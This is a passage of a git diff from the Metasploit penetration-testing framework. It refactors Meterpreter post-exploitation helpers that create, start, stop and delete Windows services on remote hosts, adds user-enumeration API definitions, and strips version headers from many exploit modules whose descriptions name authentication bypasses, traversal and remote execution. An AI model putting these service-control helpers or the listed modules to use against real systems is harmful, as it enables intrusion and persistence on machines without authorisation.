WindowsServices # __in_opt LPCTSTR lpServiceStartName, # __in_opt LPCTSTR lpPassword #); - # SC_MANAGER_CREATE_SERVICE = 0x0002 - newservice = adv.CreateServiceA(manag["return"],name,display_name, - 0x0010,0X00000010,startup,0,executable_on_host,nil,nil,nil,nil,nil) + newservice = adv.CreateServiceA(manager, name, display_name, + 0x0010, 0X00000010, startup, 0, executable_on_host, + nil, nil, nil, nil, nil) adv.CloseServiceHandle(newservice["return"]) - adv.CloseServiceHandle(manag["return"]) - #SERVICE_START=0x0010 SERVICE_WIN32_OWN_PROCESS= 0X00000010 - #SERVICE_AUTO_START = 2 SERVICE_ERROR_IGNORE = 0 if newservice["GetLastError"] == 0 return true else return false end - else - raise "Could not open Service Control Manager, Access Denied" end end # # Start a service. # - # Returns 0 if service started, 1 if service is already started and 2 if - # service is disabled. + # @param name [String] Service name (not display name) + # @param server [String,nil] A hostname or IP address. Default is the + # remote localhost + # + # @return [Fixnum] 0 if service started successfully, 1 if it failed + # because the service is already running, 2 if it is disabled + # + # @raise [RuntimeError] if OpenServiceA failed # def service_start(name, server=nil) - machine_str = server ? "\\\\#{server}" : nil adv = session.railgun.advapi32 - manag = adv.OpenSCManagerA(machine_str,nil,1) - if(manag["return"] == 0) - raise "Could not open Service Control Manager, Access Denied" - end - #open with SERVICE_START (0x0010) - servhandleret = adv.OpenServiceA(manag["return"],name,0x10) - if(servhandleret["return"] == 0) - adv.CloseServiceHandle(manag["return"]) - raise "Could not Open Service, Access Denied" - end - retval = adv.StartServiceA(servhandleret["return"],0,nil) - adv.CloseServiceHandle(servhandleret["return"]) - adv.CloseServiceHandle(manag["return"]) - if retval["GetLastError"] == 0 - return 0 - elsif retval["GetLastError"] == 1056 - return 1 - elsif retval["GetLastError"] == 1058 - return 2 + open_sc_manager(:host=>server, :access=>1) do |manager| + # SC_HANDLE WINAPI OpenService( + # _In_ SC_HANDLE hSCManager, + # _In_ LPCTSTR lpServiceName, + # _In_ DWORD dwDesiredAccess + # ); + # open with access SERVICE_START (0x0010) + handle = adv.OpenServiceA(manager, name, 0x10) + if(handle["return"] == 0) + raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}") + end + retval = adv.StartServiceA(handle["return"],0,nil) + adv.CloseServiceHandle(handle["return"]) + + # This is terrible. Magic return values should be refactored to + # something meaningful. + case retval["GetLastError"] + when 0; return 0 # everything worked + when 1056; return 1 # service already started + when 1058; return 2 # service disabled + end end end # # Stop a service. # - # Returns 0 if service is stopped successfully, 1 if service is already - # stopped or disabled and 2 if the service can not be stopped. + # @param (see #service_start) + # @return [Fixnum] 0 if service stopped successfully, 1 if it failed + # because the service is already stopped or disabled, 2 if it + # cannot be stopped for some other reason. + # + # @raise (see #service_start) # def service_stop(name, server=nil) - machine_str = server ? "\\\\#{server}" : nil adv = session.railgun.advapi32 - manag = adv.OpenSCManagerA(machine_str,nil,1) - if(manag["return"] == 0) - raise "Could not open Service Control Manager, Access Denied" - end - #open with SERVICE_STOP (0x0020) - servhandleret = adv.OpenServiceA(manag["return"],name,0x30) - if(servhandleret["return"] == 0) - adv.CloseServiceHandle(manag["return"]) - raise "Could not Open Service, Access Denied" - end - retval = adv.ControlService(servhandleret["return"],1,56) - adv.CloseServiceHandle(servhandleret["return"]) - adv.CloseServiceHandle(manag["return"]) - if retval["GetLastError"] == 0 - return 0 - elsif retval["GetLastError"] == 1062 - return 1 - elsif retval["GetLastError"] == 1052 - return 2 + + # SC_MANAGER_SERVICE_STOP (0x0020) + open_sc_manager(:host=>server, :access=>1) do |manager| + # open with SERVICE_STOP (0x0020) + handle = adv.OpenServiceA(manager, name, 0x20) + if(handle["return"] == 0) + raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}") + end + retval = adv.ControlService(handle["return"],1,56) + adv.CloseServiceHandle(handle["return"]) + + case retval["GetLastError"] + when 0; return 0 # worked + when 1062; return 1 # already stopped or disabled + when 1052; return 2 # cannot be stopped + end end end # # Delete a service. # + # @param (see #service_start) + # def service_delete(name, server=nil) - machine_str = server ? "\\\\#{server}" : nil adv = session.railgun.advapi32 - # #define SC_MANAGER_ALL_ACCESS 0xF003F - manag = adv.OpenSCManagerA(machine_str,nil,0xF003F) - if (manag["return"] == 0) - raise "Could not open Service Control Manager, Access Denied" + open_sc_manager(:host=>server) do |manager| + # Now to grab a handle to the service. + # Thank you, Wine project for defining the DELETE constant since it, + # and all its friends, are missing from the MSDN docs. + # #define DELETE 0x00010000 + handle = adv.OpenServiceA(manager, name, 0x10000) + if (handle["return"] == 0) + raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}") + end + + # Lastly, delete it + adv.DeleteService(handle["return"]) + + adv.CloseServiceHandle(handle["return"]) + + handle["GetLastError"] end - - # Now to grab a handle to the service. - # Thank you, Wine project for defining the DELETE constant since it, - # and all its friends, are missing from the MSDN docs. - # #define DELETE 0x00010000 - servhandleret = adv.OpenServiceA(manag["return"],name,0x10000) - if (servhandleret["return"] == 0) - adv.CloseServiceHandle(manag["return"]) - raise "Could not Open Service, Access Denied" - end - - # Lastly, delete it - adv.DeleteService(servhandleret["return"]) - - adv.CloseServiceHandle(manag["return"]) - adv.CloseServiceHandle(servhandleret["return"]) end end diff --git a/lib/msf/core/post/windows/shadowcopy.rb b/lib/msf/core/post/windows/shadowcopy.rb index 9d141f6e6d..cfa76ec087 100644 --- a/lib/msf/core/post/windows/shadowcopy.rb +++ b/lib/msf/core/post/windows/shadowcopy.rb @@ -10,7 +10,7 @@ module Windows # http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html module ShadowCopy - include Msf::Post::Windows::WindowsServices + include Msf::Post::Windows::Services # # Get the device name for the shadow copy, which is used when accessing diff --git a/lib/msf/scripts/meterpreter/services.rb b/lib/msf/scripts/meterpreter/services.rb index 2585161af1..bb30056aa2 100644 --- a/lib/msf/scripts/meterpreter/services.rb +++ b/lib/msf/scripts/meterpreter/services.rb @@ -6,7 +6,7 @@ module Scripts module Meterpreter module Common -include ::Msf::Post::Windows::WindowsServices +include ::Msf::Post::Windows::Services end end diff --git a/lib/packetfu/packetfu/protos/icmp.rb b/lib/packetfu/packetfu/protos/icmp.rb index 943471d82e..10f2d5d146 100644 --- a/lib/packetfu/packetfu/protos/icmp.rb +++ b/lib/packetfu/packetfu/protos/icmp.rb @@ -124,7 +124,7 @@ module PacketFu attr_accessor :eth_header, :ip_header, :icmp_header def self.can_parse?(str) - return false unless str.size >= 54 + return false unless str.size >= 38 return false unless EthPacket.can_parse? str return false unless IPPacket.can_parse? str return false unless str[23,1] == "\x01" diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb index 80983e77ce..50b5ee4500 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb @@ -35,6 +35,26 @@ class Def_netapi32 ["DWORD","resume_handle","inout"] ]) + dll.add_function('NetWkstaUserEnum', 'DWORD', [ + ["PWCHAR","servername","in"], + ["DWORD","level","in"], + ["PDWORD","bufptr","out"], + ["DWORD","prefmaxlen","in"], + ["PDWORD","entriesread","out"], + ["PDWORD","totalentries","out"], + ["DWORD","resume_handle","inout"] + ]) + + dll.add_function('NetUserGetGroups', 'DWORD', [ + ["PWCHAR","servername","in"], + ["PWCHAR","username","in"], + ["DWORD","level","in"], + ["PDWORD","bufptr","out"], + ["DWORD","prefmaxlen","in"], + ["PDWORD","entriesread","out"], + ["PDWORD","totalentries","out"] + ]) + return dll end @@ -42,4 +62,3 @@ end end; end; end; end; end; end; end - diff --git a/modules/auxiliary/admin/2wire/xslt_password_reset.rb b/modules/auxiliary/admin/2wire/xslt_password_reset.rb index 19c42c0bd9..4b33085ce0 100644 --- a/modules/auxiliary/admin/2wire/xslt_password_reset.rb +++ b/modules/auxiliary/admin/2wire/xslt_password_reset.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary configuration changes (such as resetting the password) as administrators. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'hkm [at] hakim.ws', #Initial discovery, poc diff --git a/modules/auxiliary/admin/backupexec/dump.rb b/modules/auxiliary/admin/backupexec/dump.rb index 2f7f2d7873..b76e345dcf 100644 --- a/modules/auxiliary/admin/backupexec/dump.rb +++ b/modules/auxiliary/admin/backupexec/dump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm', 'Unknown' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-2611'], diff --git a/modules/auxiliary/admin/backupexec/registry.rb b/modules/auxiliary/admin/backupexec/registry.rb index 349a804311..042bf8cdf8 100644 --- a/modules/auxiliary/admin/backupexec/registry.rb +++ b/modules/auxiliary/admin/backupexec/registry.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '17627' ], diff --git a/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb b/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb index 82786e097c..7333067af6 100644 --- a/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb +++ b/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'Cisco Secure ACS Version < 5.1.0.44.5 or 5.2.0.26.2 Unauthorized Password Change', - 'Version' => '$Revision$', 'Description' => %q{ This module exploits an authentication bypass issue which allows arbitrary password change requests to be issued for any user in the local store. diff --git a/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb b/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb index 5992230732..b0890ea45e 100644 --- a/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb +++ b/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'BID', '19680' ], diff --git a/modules/auxiliary/admin/db2/db2rcmd.rb b/modules/auxiliary/admin/db2/db2rcmd.rb index 889389947a..eb31630122 100644 --- a/modules/auxiliary/admin/db2/db2rcmd.rb +++ b/modules/auxiliary/admin/db2/db2rcmd.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0795' ], diff --git a/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb b/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb index 6c3dae81c3..c15610dee7 100644 --- a/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb +++ b/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,8 +27,7 @@ class Metasploit3 < Msf::Auxiliary ['OSVDB', '60035'], ], 'Author' => 'hdm', - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options([ diff --git a/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb b/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb index 895db730f3..b26da0d33d 100644 --- a/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb +++ b/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703' ], diff --git a/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb b/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb index 24f240795a..d83dcec60c 100644 --- a/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb +++ b/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703' ], diff --git a/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb b/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb index e25693f213..476ccc65f2 100644 --- a/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb +++ b/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +30,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'jduck', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '65533'], diff --git a/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb b/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb index 7331ec37d6..ab94edb661 100644 --- a/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb +++ b/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'ContentKeeper Web Appliance mimencode File Access', - 'Version' => '$Revision$', 'Description' => %q{ This module abuses the 'mimencode' binary present within ContentKeeper Web filtering appliances to retrieve arbitrary diff --git a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb index c3588f89b9..4d4cd801b1 100644 --- a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb +++ b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '5798' ], diff --git a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb index f779477cf0..cfeb05caa3 100644 --- a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb +++ b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Iomega StorCenter Pro NAS Web Authentication Bypass', - 'Version' => '$Revision$', 'Description' => %q{ The Iomega StorCenter Pro Network Attached Storage device web interface increments sessions IDs, allowing for simple brute force attacks to bypass authentication and gain administrative diff --git a/modules/auxiliary/admin/http/tomcat_administration.rb b/modules/auxiliary/admin/http/tomcat_administration.rb index 587196a6f9..a7b491a9fc 100644 --- a/modules/auxiliary/admin/http/tomcat_administration.rb +++ b/modules/auxiliary/admin/http/tomcat_administration.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Tomcat Administration Tool Default Access', - 'Version' => '$Revision$', 'Description' => 'Detect the Tomcat administration interface.', 'References' => [ diff --git a/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb b/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb index 65f36f19fb..c274b87aa8 100644 --- a/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb +++ b/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Tomcat UTF-8 Directory Traversal Vulnerability', - 'Version' => '$Revision$', 'Description' => %q{ This module tests whether a directory traversal vulnerablity is present in versions of Apache Tomcat 4.1.0 - 4.1.37, 5.5.0 - 5.5.26 and 6.0.0 diff --git a/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb b/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb index f74a15c939..831efcdb24 100644 --- a/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb +++ b/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'TrendMicro Data Loss Prevention 5.5 Directory Traversal', - 'Version' => '$Revision$', 'Description' => %q{ This module tests whether a directory traversal vulnerablity is present in Trend Micro DLP (Data Loss Prevention) Appliance v5.5 build <= 1294. diff --git a/modules/auxiliary/admin/http/typo3_sa_2009_001.rb b/modules/auxiliary/admin/http/typo3_sa_2009_001.rb index 312158392f..b1c6aa786c 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2009_001.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2009_001.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +15,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'TYPO3 sa-2009-001 Weak Encryption Key File Disclosure', - 'Version' => '$Revision$', 'Description' => %q{ This module exploits a flaw in TYPO3 encryption ey creation process to allow for file disclosure in the jumpUrl mechanism. This flaw can be used to read any file diff --git a/modules/auxiliary/admin/http/typo3_sa_2009_002.rb b/modules/auxiliary/admin/http/typo3_sa_2009_002.rb index 81e1112400..948a3e673d 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2009_002.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2009_002.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'spinbad ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '52048'], diff --git a/modules/auxiliary/admin/http/typo3_sa_2010_020.rb b/modules/auxiliary/admin/http/typo3_sa_2010_020.rb index 5a9c9b7390..993d4f4f0f 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2010_020.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2010_020.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'TYPO3 sa-2010-020 Remote File Disclosure', - 'Version' => '$Revision$', 'Description' => %q{ This module exploits a flaw in the way the TYPO3 jumpurl feature matches hashes. Due to this flaw a Remote File Disclosure is possible by matching the juhash of 0. diff --git a/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb b/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb index 7fef9a1edf..4630d40894 100644 --- a/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb +++ b/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +15,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'TYPO3 Winstaller default Encryption Keys', - 'Version' => '$Revision$', 'Description' => %q{ This module exploits known default encryption keys found in the TYPO3 Winstaller. This flaw allows for file disclosure in the jumpUrl mechanism. This issue can be diff --git a/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb b/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb index 4a504fd646..9cb5390922 100644 --- a/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb +++ b/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '40210' ], diff --git a/modules/auxiliary/admin/motorola/wr850g_cred.rb b/modules/auxiliary/admin/motorola/wr850g_cred.rb index 1da7df6574..968ada625b 100644 --- a/modules/auxiliary/admin/motorola/wr850g_cred.rb +++ b/modules/auxiliary/admin/motorola/wr850g_cred.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1550' ], [ 'OSVDB', '10232' ], diff --git a/modules/auxiliary/admin/ms/ms08_059_his2006.rb b/modules/auxiliary/admin/ms/ms08_059_his2006.rb index c2c241eba3..5975cb86f4 100644 --- a/modules/auxiliary/admin/ms/ms08_059_his2006.rb +++ b/modules/auxiliary/admin/ms/ms08_059_his2006.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'MSB', 'MS08-059' ], diff --git a/modules/auxiliary/admin/mssql/mssql_enum.rb b/modules/auxiliary/admin/mssql/mssql_enum.rb index b439673ef8..ad63351a74 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,8 +22,7 @@ class Metasploit3 < Msf::Auxiliary supplied. }, 'Author' => [ 'Carlos Perez ' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) end diff --git a/modules/auxiliary/admin/mssql/mssql_exec.rb b/modules/auxiliary/admin/mssql/mssql_exec.rb index 9c338000ec..b70975a410 100644 --- a/modules/auxiliary/admin/mssql/mssql_exec.rb +++ b/modules/auxiliary/admin/mssql/mssql_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'tebo ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx'], diff --git a/modules/auxiliary/admin/mssql/mssql_idf.rb b/modules/auxiliary/admin/mssql/mssql_idf.rb index 278fc84034..7bf3f9f42e 100644 --- a/modules/auxiliary/admin/mssql/mssql_idf.rb +++ b/modules/auxiliary/admin/mssql/mssql_idf.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # Author: Robin Wood # Version: 0.1 @@ -38,7 +34,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Robin Wood ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.digininja.org/metasploit/mssql_idf.php' ], diff --git a/modules/auxiliary/admin/mssql/mssql_sql.rb b/modules/auxiliary/admin/mssql/mssql_sql.rb index 75697d4cff..5ed7e39f32 100644 --- a/modules/auxiliary/admin/mssql/mssql_sql.rb +++ b/modules/auxiliary/admin/mssql/mssql_sql.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'tebo ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.attackresearch.com' ], diff --git a/modules/auxiliary/admin/mysql/mysql_enum.rb b/modules/auxiliary/admin/mysql/mysql_enum.rb index abe182ae60..62517dba8c 100644 --- a/modules/auxiliary/admin/mysql/mysql_enum.rb +++ b/modules/auxiliary/admin/mysql/mysql_enum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Carlos Perez ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'https://cisecurity.org/benchmarks.html' ] diff --git a/modules/auxiliary/admin/mysql/mysql_sql.rb b/modules/auxiliary/admin/mysql/mysql_sql.rb index 539a2f89e4..d4a5dcb96d 100644 --- a/modules/auxiliary/admin/mysql/mysql_sql.rb +++ b/modules/auxiliary/admin/mysql/mysql_sql.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,8 +21,7 @@ class Metasploit3 < Msf::Auxiliary against a MySQL instance given the appropriate credentials. }, 'Author' => [ 'Bernardo Damele A. G. ' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$' + 'License' => MSF_LICENSE )) register_options( diff --git a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb index edc05e66b0..698af5acfe 100644 --- a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb +++ b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access', - 'Version' => '$Revision$', 'Description' => %q{ This module tests for directory traversal vulnerability in the UpdateAgent function in the OfficeScanNT Listener (TmListen.exe) service in Trend Micro diff --git a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb index d86eea29e6..f50d28e88e 100644 --- a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb +++ b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Sh2kerr ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://dsecrg.com/pages/pub/show.php?id=17' ], diff --git a/modules/auxiliary/admin/oracle/oracle_login.rb b/modules/auxiliary/admin/oracle/oracle_login.rb index 34d0111e52..e5ebb671eb 100644 --- a/modules/auxiliary/admin/oracle/oracle_login.rb +++ b/modules/auxiliary/admin/oracle/oracle_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'MC' ], 